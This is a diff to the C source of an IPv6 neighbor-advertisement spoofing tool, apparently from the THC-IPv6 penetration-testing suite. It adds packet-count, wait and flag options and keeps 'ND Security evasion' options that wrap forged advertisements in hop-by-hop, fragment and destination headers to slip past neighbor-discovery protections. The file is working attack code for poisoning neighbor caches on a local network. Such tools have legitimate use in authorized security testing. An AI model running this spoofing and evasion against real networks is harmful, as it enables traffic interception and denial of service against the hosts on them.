@@ -1,4 +1,3 @@
-
 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
@@ -12,20 +11,30 @@
 #include "thc-ipv6.h"
 
 void help(char *prg) {
-  printf("%s %s (c) 2012 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
-  printf("Syntax: %s [-DHF] interface ip-address-advertised [target-address [mac-address-advertised [source-ip-address]]]\n\n", prg);
-  printf("Advertise ipv6 address on the network (with own mac if not defined)\n");
-  printf("sending it to the all-nodes multicast address if no target specified.\n");
-  printf("Option -H adds a hop-by-hop header, -F a one shot fragment header,\n");
-  printf("-D adds a large destination header which fragments the packet.\n");
-//  printf("Use -r to use raw mode.\n\n");
+  printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
+  printf("Syntax: %s [-DHF] [-Ors] [-n count] [-w seconds] interface ip-address-advertised [target-address [mac-address-advertised [source-ip-address]]]\n\n", prg);
+  printf("Advertise IPv6 address on the network (with own mac if not specified),\n");
+  printf("sending it to the all-nodes multicast address if no target address is set.\n");
+  printf("Source ip address is the address advertised if not set.\n\n");
+  printf("Sending options:\n");
+  printf("  -n count    send how many packets (default: forever)\n");
+  printf("  -w seconds  wait time between the packets sent (default: 5)\n");
+  printf("Flag options:\n");
+  printf("  -O  do NOT set the override flag (default: on)\n");
+  printf("  -r  DO set the router flag (default: off)\n");
+  printf("  -s  DO set the solicitate flag (default: off)\n");
+  printf("ND Security evasion options (can be combined):\n");
+  printf("  -H  add a hop-by-hop header\n");
+  printf("  -F  add a one shot fragment header (can be specified multiple times)\n");
+  printf("  -D  add a large destination header which fragments the packet.\n");
   exit(-1);
 }
 
 int main(int argc, char *argv[]) {
   unsigned char *pkt1 = NULL, *pkt2 = NULL, buf[24], buf2[6], buf3[1500];
   unsigned char *unicast6, *src6 = NULL, *dst6 = NULL, srcmac[16] = "", *mac = srcmac;
-  int pkt1_len = 0, pkt2_len = 0, flags, prefer = PREFER_GLOBAL, i, do_hop = 0, do_dst = 0, do_frag = 0, cnt, type = NXT_ICMP6;
+  int pkt1_len = 0, pkt2_len = 0, prefer = PREFER_GLOBAL, i, do_hop = 0, do_dst = 0, do_frag = 0, cnt, type = NXT_ICMP6, wait = 5, loop = -1;
+  unsigned int flags = ICMP6_NEIGHBORADV_OVERRIDE;
   char *interface;
   int offset = 14;
   thc_ipv6_hdr *hdr;
@@ -35,8 +44,24 @@ int main(int argc, char *argv[]) {
 
   if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]);
 
-  while ((i = getopt(argc, argv, "DFH")) >= 0) {
+  while ((i = getopt(argc, argv, "DFHOrsn:w:")) >= 0) {
     switch (i) {
+    case 'n':
+      loop = atoi(optarg);
+      break;
+    case 'w':
+      wait = atoi(optarg);
+      break;
+    case 'O':
+      if ((flags & ICMP6_NEIGHBORADV_OVERRIDE) > 0)
+        flags -= ICMP6_NEIGHBORADV_OVERRIDE;
+      break;
+    case 'r':
+      flags = (flags | ICMP6_NEIGHBORADV_ROUTER);
+      break;
+    case 's':
+      flags = (flags | ICMP6_NEIGHBORADV_SOLICIT);
+      break;
     case 'F':
       do_frag++;
       break;
@@ -59,6 +84,10 @@ int main(int argc, char *argv[]) {
     offset = do_hdr_size;
 
   interface = argv[optind];
+  if (thc_get_own_mac(interface) == NULL) {
+    fprintf(stderr, "Error: invalid interface %s\n", interface);
+    exit(-1);
+  }
   if ((unicast6 = thc_resolve6(argv[optind + 1])) == NULL) {
     fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[optind + 1]);
     exit(-1);
@@ -86,11 +115,10 @@ int main(int argc, char *argv[]) {
   buf[16] = 2;
   buf[17] = 1;
   memcpy(&buf[18], mac, 6);
-  flags = ICMP6_NEIGHBORADV_OVERRIDE;
   memset(buf2, 0, sizeof(buf2));
   memset(buf3, 0, sizeof(buf3));
 
-  if ((pkt1 = thc_create_ipv6(interface, prefer, &pkt1_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL)
+  if ((pkt1 = thc_create_ipv6_extended(interface, prefer, &pkt1_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL)
     return -1;
   if (do_hop) {
     type = NXT_HBH;
@@ -116,7 +144,7 @@ int main(int argc, char *argv[]) {
     fprintf(stderr, "Error: Can not generate packet, exiting ...\n");
     exit(-1);
   }
-  if ((pkt2 = thc_create_ipv6(interface, prefer, &pkt2_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL)
+  if ((pkt2 = thc_create_ipv6_extended(interface, prefer, &pkt2_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL)
     return -1;
   if (do_hop)
     if (thc_add_hdr_hopbyhop(pkt2, &pkt2_len, buf2, sizeof(buf2)) < 0)
@@ -136,7 +164,7 @@ int main(int argc, char *argv[]) {
   }
 
   printf("Starting advertisement of %s (Press Control-C to end)\n", argv[optind + 1]);
-  while (1) {
+  while (loop) {
     if (do_dst) {
       hdr = (thc_ipv6_hdr *) pkt1;
       thc_send_as_fragment6(interface, src6, dst6, type, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240);
@@ -146,7 +174,10 @@ int main(int argc, char *argv[]) {
       thc_send_pkt(interface, pkt1, &pkt1_len);
       thc_send_pkt(interface, pkt2, &pkt2_len);
     }
-    sleep(5);
+    if (loop != -1)
+      loop--;
+    if (loop)
+      sleep(wait);
   }
 
   return 0;
